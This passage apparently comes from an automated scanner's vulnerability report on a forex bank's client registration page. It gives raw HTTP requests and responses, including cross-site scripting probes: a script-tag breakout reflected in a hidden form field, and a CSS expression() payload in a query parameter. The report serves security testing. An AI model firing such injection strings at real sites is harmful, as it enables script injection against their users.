    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;https://live-login.dukascopy.com/fo/register/live/index.php&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[managedAccountStrategy]&quot; value=&quot;1ABEM3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[serviceProvider]&quot; value=&quot;BBAC47&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[TYPE]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0address]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0city]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0correspondanceAddress]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0country]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0dateBirth_day]&quot; value=&quot;0&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0dateBirth_month]&quot; value=&quot;0&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0dateBirth_year]&quot; value=&quot;0&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0EMAIL]&quot; value=&quot;netsparker@example.com&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0EMAIL_CONF_]&quot; value=&quot;netsparker@example.com&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0HOLDER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0HOLDER_FIRST_NAME]&quot; value=&quot;Ronald Smith&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0HOLDER_LAST_NAME]&quot; value=&quot;Ronald Smith&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0lang]&quot; value=&quot;french&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0martialstatus]&quot; value=&quot;Married&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0mobilephone]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0nationality]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0NICKNAME]&quot; value=&quot;Ronald Smith&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0phone]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0placeBirth]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0privatefax]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0professionalfax]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0title]&quot; value=&quot;Mrs.&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0workphone]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ja0zipcode]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[jointAccIndex]&quot; value=&quot;0&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[ACCOUNT_TYPE_ID]&quot; value=&quot;1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[PERSON_TYPE_ID]&quot; value=&quot;1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[HOLDER]&quot; value=&quot;3, &quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[EMAIL]&quot; value=&quot;netsparker@example.com&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[EMAIL_CONF_]&quot; value=&quot;netsparker@example.com&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[STATUS]&quot; value=&quot;N&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[UIN]&quot; value=&quot;21uEQD5CAD&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[LOGIN]&quot; value=&quot;21uEQD5CAD&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;aData[IP]&quot; value=&quot;173.193.214.243&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00057C)&lt;/script&gt;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php?aData%5BaccountKind%5D=6&amp;aData%5BextManAnswer%5D=Yes&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BHTTP_REFERER%5D=3&amp;aData%5BmanagedAccountStrategy%5D=1ABEM3&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BSTRAT_REF%5D=%3C/a%20style=x:expre/**/ssion(netsparker(0x000444))%3E&amp;aData%5BTYPE%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;next=Submit&amp;nextFormMarker=step2</url>
		<type>InternalServerError</type>
		<severity>Low</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>aData[STRAT_REF]</vulnerableparameter>
		<vulnerableparametervalue>&lt;/a style=x:expre/**/ssion(netsparker(0x000444))&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[GET /fo/register/live/index.php?aData%5BaccountKind%5D=6&amp;aData%5BextManAnswer%5D=Yes&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BHTTP_REFERER%5D=3&amp;aData%5BmanagedAccountStrategy%5D=1ABEM3&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BSTRAT_REF%5D=%3C/a%20style=x:expre/**/ssion(netsparker(0x000444))%3E&amp;aData%5BTYPE%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;next=Submit&amp;nextFormMarker=step2 HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: live-login.dukascopy.com
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 500 Internal Server Error
Date: Thu, 17 Mar 2011 19:28:27 GMT
Server: Apache/2
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en


&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot;
  &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot; lang=&quot;en&quot; xml:lang=&quot;en&quot;&gt;
&lt;head&gt;
&lt;title&gt;Server error!&lt;/title&gt;
&lt;link rev=&quot;made&quot; href=&quot;mailto:%5bno%20address%20given%5d&quot; /&gt;
&lt;style type=&quot;text/css&quot;&gt;&lt;!--/*--&gt;&lt;![CDATA[/*&gt;&lt;!--*/ 
    body { color: #000000; background-color: #FFFFFF; }
    a:link { color: #0000CC; }
    p, address {margin-left: 3em;}
    span {font-size: smaller;}
/*]]&gt;*/--&gt;&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;
&lt;h1&gt;Server error!&lt;/h1&gt;
&lt;p&gt;


  

    The server encountered an internal error and was 
    unable to complete your request.

    &lt;/p&gt;
&lt;p&gt;


    Error message:
    &lt;br /&gt;Premature end of script headers: index.php

  

&lt;/p&gt;
&lt;p&gt;
If you think this is a server error, please contact
the &lt;a href=&quot;mailto:%5bno%20address%20given%5d&quot;&gt;webmaster&lt;/a&gt;.

&lt;/p&gt;

&lt;h2&gt;Error 500&lt;/h2&gt;
&lt;address&gt;
  &lt;a href=&quot;/&quot;&gt;live-login.dukascopy.com&lt;/a&gt;&lt;br /&gt;
  
  &lt;span&gt;Thu Mar 17 19:28:27 2011&lt;br /&gt;
  Apache/2&lt;/span&gt;
&lt;/address&gt;
&lt;/body&gt;
&lt;/html&gt;

 ]]></rawresponse>

		<extrainformation>
		</extrainformation>

				
	</vulnerability>

	<vulnerability confirmed="False">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>PHPVersion</type>
		<severity>Low</severity>
		

		<rawrequest><![CDATA[GET /fo/register/live/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: live-login.dukascopy.com
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:24:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
